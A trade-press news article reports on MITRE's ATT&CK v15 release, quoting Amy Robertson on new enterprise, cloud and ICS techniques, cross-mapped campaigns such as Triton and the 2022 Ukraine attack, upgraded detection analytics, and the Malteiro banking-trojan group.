MITRE unveils ATT&CK v15 with upgraded detections, analytic format, cross-domain adversary insights

Non-profit organization MITRE has unveiled ATT&CK v15, introducing improved detections, a new analytic format, and cross-domain adversary insights. The latest release encompasses enhancements spanning Enterprise, Mobile, and ICS (industrial control system), touching on Techniques, Groups, Software, Campaigns, and Defenses. Notably, there is a significant emphasis on enhancing ATT&CK’s defensive recommendations through a revamped analytic format. 

Special attention has been given to incorporating detection analytics and guidance into the Execution Tactic of Enterprise ATT&CK, along with expanded defense coverage within the Cloud matrix.

“v15 is all about actionability and bringing defenders’ reality into focus — we prioritized what you need to detect, and how you can do it more effectively with detection engineering upgrades, and deeper intelligence insights across platforms,” Amy L. Robertson, wrote in a Medium post, on Tuesday. “This release also reflects the new expansion rhythm, balancing both well-known and emerging behaviors to reflect how trends and activity are experienced in the field.”

She highlighted that v16 will launch ICS sub-techniques, along with a structured cross-walk to enable mapping between deprecated and new techniques. We’ll also be releasing new asset coverage and updates on our exploration into incorporating more sectors into the ICS matrix.

MITRE has been working to retrofit major incidents in the ICS space to improve understanding and showcase how ICS and enterprise techniques intersect in each event, Robertson detailed. V15 illuminates some of the ICS-Enterprise integration efforts, with the release of four cross-mapped campaigns, starting with Triton, the Safety Instrumented System attack of 2017 that shook the petrochemical industry to its core; and then there’s C0032, a campaign spanning various utilities from 2014 to 2017, often grouped with the petrochemical incident but distinctly different in nature.

Robertson also highlighted Unitronics, a campaign that targeted specific devices and had a significant impact on utilities and organizations globally. During this initiative, adversaries disrupted device interfaces to render them unusable for end users. “Fast forward to 2022 Ukraine Electric Power, where we witnessed a glimpse into the future of ICS attacks, with hypervisor features and shared domain access exploited to infiltrate ICS systems and unleash havoc. The campaign highlights key considerations regarding hypervisor usage across multiple domains and the abuse of native features in vendor software,” she added.

Additionally, she added that the 2022 Ukraine also spawned two new ICS techniques that are featured in this release: T0895: Autorun Image and T0894:System Binary Proxy Execution via vendor application binaries.

Last week, Robertson outlined that ICS is leveling up this year. “Our goals include broadening ICS horizons with new asset coverage, exploring platform scope expansion, and continuing our multi-domain integration quest. We’ll also be diving deeper into adversary behaviors with the introduction of sub-techniques. v15 will showcase some of integration efforts, with the release of cross-mapped campaigns. These campaigns track IT to OT attack sequences, helping defenders better understand multi-domain intrusions and informing unified defense strategies across technology environments.”

Moving to Enterprise in her latest post, Robertson said that with v15 “we were aiming for the perfect balance of familiar behaviors you’ve probably seen countless times (e.g., T1027.013: Obfuscated Files or Information: Encrypted/ Encoded File, T1665: Hide Infrastructure), as well as newer, emerging trends. The shadowy domain of Resource Development was expanded to illuminate how adversaries are using generative artificial intelligence tools, like large language models (LLMs), to support various malicious activities (T1588.007: Obtain Capabilities: Artificial Intelligence).”

She added, “It’s not just about gaining initial access anymore — we added T1584.008: Compromise Infrastructure: Network Devices to capture how threat groups are hacking into third-party network devices, including small office/home office routers, to use these devices to facilitate further targeting.”

When it comes to the Cloud, Robertson pointed to the ATT&CK 2024 Roadmap that addresses the organization’s commitment to enhancing the Cloud matrix to be more approachable for defenders of all skill levels. “With this release, we focused on providing a broader set of defensive measures, resources, and insights for CI/CD pipelines, Infrastructure as Code (IaC), and Identity. v15 features new mitigations and data sources on token protection, along with more specific references to Okta logs. T1072: Software Deployment Tools was expanded to include broad execution of T1651: Cloud Administration Command, reflecting how threat actors are turning cloud native tools like AWS Systems Manager into remote access trojans,” she added.

“We ramped up resources for CI/CD pipelines and IaC, and made some refinements to Identity, with the expansion of T1484: Domain Policy Modification to include not just Azure AD, but also other identity-as-a-service providers like Okta,” according to Robertson. “T1556: Modify Authentication Process gained a new sub (T1556.009: Conditional Access Policies) exploring how threat actors have tampered with or disabled conditional access policies for ongoing access to compromised accounts. We also expanded T1136.003: Create Account: Cloud Account with additional service account insights.”

She also mentioned that v16 will feature robust identity and detection updates, as well as the platform rebalancing operations, “where we’re focusing on covering a wider range of cloud environments and threats, while making it more intuitive to prioritize techniques relevant to a specific platform.”

Robertson identified that MITRE expanded detections in v15 to assist detection engineering. “Previously, we structured our analytics in a pseudo format that was consistent with the Cyber Analytic Repository (CAR). In some cases, this was hard to understand. In v15, we transformed that format into a real-world query language style (like Splunk) that is compatible with various security tools. These upgrades are featured in detections across the framework including some techniques within the Execution tactic,” she added.

“Our aim with these upgrades is to reflect the data source itself is the data you should be collecting and to provide an understandable format that pairs well with every day defender tools (i.e. SIEMs and Sensors),” according to Robertson. “We have also synced up some mitigations within the parent-to-sub-technique relationship. Our team has analyzed a list of sub-techniques that had mitigations that the parent technique did not have. In v15, you will find some parent techniques now reflect what mitigations are seen in the sub-technique.”

She added “As we gear up for October, we’ll be completing the Execution detections, refining Credential Access detections, diving into Cloud analytics, and restructuring our data sources for better accessibility.”

Addressing cyber threat intelligence, Robertson identified that “We’re working towards better reflecting the threat landscape by infusing the framework with more cybercriminal and underreported adversary activity. This release showcases new cybercriminal operations and highlights Malteiro, a criminal group believed to be based in Brazil. They are known for operating and distributing the Mispadu/URSA banking trojan through a malware-as-a-service model.” 

She pointed out that banking trojans, a notorious threat in Latin America, are increasingly spreading their chaos across borders, courtesy of malware developers selling tools to overseas operators. Malteiro’s operations exemplify this targeting shift, evident in a recent campaign affecting European entities across various sectors.

She added “We’ll continue conducting thorough assessments of Groups, Software, and Campaigns to up the framework realism quotient and provide clearer insights into adversary activities. We’re also teaming up with ATT&CK domain leads to expand coverage of cross-domain intrusions.”

Robertson also said that MITRE has been working “towards our goals of enhancing Navigator’s usability and streamlining processes for ATT&CK Workbench. Most importantly, we’re taking our TAXII server to new heights, and by December 18, we’ll be retiring the TAXII 2.0 server and transitioning to the upgraded TAXII 2.1 version. You can locate the documentation for the TAXII 2.1 server in our GitHub repository.”

“We’ll be continuing to enhance usability on ATT&CK Workbench and Navigator, and building towards swifter Groups and Software releases,” she added.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.